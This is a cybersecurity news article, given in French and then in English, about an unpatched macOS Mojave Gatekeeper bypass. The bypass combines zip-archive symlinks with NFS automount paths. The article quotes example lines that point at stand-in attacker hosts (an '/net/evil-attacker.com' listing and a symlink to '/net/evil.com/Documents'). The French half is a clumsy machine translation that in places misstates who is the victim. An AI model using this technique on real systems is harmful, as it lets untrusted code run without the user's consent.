MacOS X non corrigée GateKeeper de dérivation mène à exécution de code arbitraire
CYBER NOUVELLES

MacOS X non corrigée GateKeeper de dérivation mène à exécution de code arbitraire

Une vulnérabilité non corrigée dans macOS 10.14.5 également connu sous le nom de Mojave a été récemment découvert. La faille pourrait permettre à un attaquant d'exécuter du code arbitraire sans nécessiter d'interaction de l'utilisateur, contournant ainsi Gatekeeper.

Cette découverte vient du chercheur Filippo Cavallarin du segment, une société de cybersécurité basée en Italie. "Sur Mac OS X version <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to execute untrusted code without any warning or user's explicit permission,» Le chercheur a écrit.




Comment est le by-pass Gatekeeper possible?

Première, il convient de noter qu'il est dans la conception de Gatekeeper d'accepter les deux disques externes et les partages réseau comme lieu sûr, permettant des applications qu'ils contiennent de fonctionner sans problèmes. Cependant, en réunissant deux caractéristiques légitimes de macOS, il est possible de tromper le Gatekeeper et son «comportement prévu".

Si, quelles sont ces caractéristiques? La première permet à un utilisateur de monter automatiquement un partage réseau en acceptant simplement un chemin commençant par « / net / »:

Par exemple
ls /net/evil-attacker.com/sharedfolder/
fera l'os lire le contenu de la « sharedfolder’ sur l'hôte distant (evil-attacker.com) en utilisant NFS.

L'autre caractéristique est sur les archives zip contenant des liens symboliques qui pointent vers des emplacements arbitraires. En outre, le logiciel qui décompresse les fichiers zip sur macOS n'effectue aucun contrôle sur les liens symboliques avant de les créer, le chercheur a expliqué.

Comment un travail d'attaque? Un attaquant pourrait concevoir un fichier zip avec un lien symbolique vers un point final contrôlé hacker-automount (ex Documents -> /net/evil.com/Documents) et pourrait l'envoyer à un système ciblé. L'utilisateur malveillant télécharger l'archive, et va extraire le fichier malveillant sans se douter de rien.

Maintenant, la victime est dans un endroit contrôlé par l'attaquant, mais la confiance de Gatekeeper, de sorte que toute exécutable contrôlé par l'attaquant peut être exécuté sans aucun avertissement. La façon dont Finder est conçu (extensions ex cacher .app, cacher le chemin complet de titlebar) rend cette tecnique très efficace et difficile à repérer, le chercheur a noté.

Il y a aussi un démonstration vidéo de la façon dont fonctionne cette dérivation Gatekeeper.

en relation: Fichiers Windows .exe pontages Gatekeeper et téléchargements Malware sur Mac

Ce n'est pas le premier cas de macOS accumulation dans la protection a.k.a. Gatekeeper contournée. En Février de cette année, les chercheurs en sécurité de Trend Micro ont découvert qu'un fichier .exe de Windows malveillant peut infecter les ordinateurs Mac, et pourrait télécharger des logiciels malveillants infostealer accompagnés de logiciels publicitaires sur leurs systèmes.

Dans ce cas, les fichiers .exe ont pu se soustraire à la protection de Gatekeeper parce qu'ils ne sont pas contrôlés par le logiciel, conçu pour vérifier uniquement les fichiers Mac natifs. Cela pourrait conduire à contourner la vérification de la signature de code et la vérification.

Milena Dimitrova

Milena Dimitrova

Un écrivain inspiré et gestionnaire de contenu qui a été avec SensorsTechForum depuis le début. Axé sur la vie privée des utilisateurs et le développement des logiciels malveillants, elle croit fermement dans un monde où la cybersécurité joue un rôle central. Si le bon sens n'a pas de sens, elle sera là pour prendre des notes. Ces notes peuvent se tourner plus tard dans les articles! Suivre Milena @Milenyim

Plus de messages

Suivez-moi:
Gazouillement

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont marqués *

Délai est épuisé. S'il vous plaît recharger CAPTCHA.

Partager sur Facebook Partager
Loading ...
Partager sur Twitter Tweet
Loading ...
Partager sur Google Plus Partager
Loading ...
Partager sur Linkedin Partager
Loading ...
Partager sur Digg Partager
Partager sur Reddit Partager
Loading ...
Partager sur Stumbleupon Partager
Loading ...

Unpatched MacOS X GateKeeper Bypass Leads to Arbitrary Code Execution
CYBER NEWS

Unpatched MacOS X GateKeeper Bypass Leads to Arbitrary Code Execution

1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet)
Loading...

An unpatched vulnerability in macOS 10.14.5 also known as Mojave was recently discovered. The flaw could allow an attacker to execute arbitrary code without the need of user interaction, thus bypassing Gatekeeper.

This discovery comes from researcher Filippo Cavallarin from Segment, an Italy-based cybersecurity company. “On MacOS X version <= 10.14.5 (at time of writing) it is possible to easily bypass Gatekeeper in order to execute untrusted code without any warning or user's explicit permission,” the researcher wrote.




How is the Gatekeeper bypass possible?

First, it should be noted that it’s in Gatekeeper’s design to accept both external drives and network shares as safe location, allowing apps that they contain to run flawlessly. However, by putting together two legitimate features of macOS, it is possible to deceive the Gatekeeper and its “intended behavior”.

So, what are these features? The first one allows a user to automatically mount a network share by simply accepting a path beginning with “/net/”:

For example
ls /net/evil-attacker.com/sharedfolder/
will make the os read the content of the ‘sharedfolder’ on the remote host (evil-attacker.com) using NFS.

The other feature is about zip archives containing symbolic links that point to arbitrary locations. Furthermore, the software that decompresses zip files on macOS doesn’t perform checks on the symlinks prior to creating them, the researcher explained.

How would an attack work? An attacker could craft a zip file with a symbolic link to an automount hacker-controlled endpoint (ex Documents -> /net/evil.com/Documents) and could send it to a targeted system. The user would download the malicious archive, and would extract the malicious file without suspecting anything.

Now the victim is in a location controlled by the attacker but trusted by Gatekeeper, so any attacker-controlled executable can be run without any warning. The way Finder is designed (ex hide .app extensions, hide full path from titlebar) makes this tecnique very effective and hard to spot, the researcher noted.

There’s also a video demonstration of how this Gatekeeper bypass works.

Related: Windows .exe File Bypasses Gatekeeper and Downloads Malware on Macs

This is not the first case of macOS build-in protection a.k.a. Gatekeeper being bypassed. In February this year, Trend Micro security researchers discovered that a malicious Windows .exe file could infect Mac computers, and could download infostealer malware accompanied by adware on their systems.

In that case, the .exe files were able to evade Gatekeeper’s protection because they were not checked by the software, designed to check only native Mac files. This could lead to bypassing the code signature check and verification.

Avatar

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum for 4 years. Enjoys ‘Mr. Robot’ and fears ‘1984’. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles!

More Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.

Share on Facebook Share
Loading...
Share on Twitter Tweet
Loading...
Share on Google Plus Share
Loading...
Share on Linkedin Share
Loading...
Share on Digg Share
Share on Reddit Share
Loading...
Share on Stumbleupon Share
Loading...